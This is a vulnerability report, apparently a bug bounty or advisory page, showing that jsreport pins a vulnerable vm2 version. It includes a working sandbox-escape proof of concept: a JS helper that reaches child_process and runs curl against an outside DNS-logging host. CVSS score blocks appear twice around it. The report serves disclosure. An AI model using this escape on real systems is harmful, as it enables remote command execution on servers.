10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
26.7%
A few days ago, the vm2 module of nodejs found a sandbox escape vulnerability, which was officially fixed in v3.9.15
However, a fixed vm2 version is hard-coded in the package.json(v 3.9.11) of the jsreport-core component of jsreport, which makes it impossible to install the latest vm2 every time
The relevant details and POC of this sandbox escape are publicly available:
By testing on the official playground of jsreport, it is found that the vulnerability exists
tested on jsreport official playground.
playground workspace(with poc inside):
https://playground.jsreport.net/w/anon/f9agld17
the html content used to generate a pdf
<style>
th {
font-size: 20px;
}
td, th {
background-color: #abe81b;
border: 3px solid #455bd0;
padding: 10px;
text-align: center;
}
</style>
<table>
<tr>
<th>Name</th>
<th>Age</th>
<th>Job</th>
<th>Random</th>
</tr>
{{#each people}}
<tr>
<td>{{name}}</td>
<td>{{age}}</td>
<td>{{job}}</td>
<td>{{getRandom}}</td>
</tr>
{{/each}}
</table>
the js code which will be called while generating the pdf
function getRandom() {
Error.prepareStackTrace = (e, frames) => {
frames.constructor.constructor('return process')().mainModule.require('child_process').execSync('curl http://zf2o8e.dnslog.cn');
};
(async ()=>{}).constructor('return process')()
return Math.random()
}
Click the run
button.
Fom the report log on the right, you can see that curl http://zf2o8e.dnslog.cn
was executed and a DNS resolution error was thrown.
10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
26.7%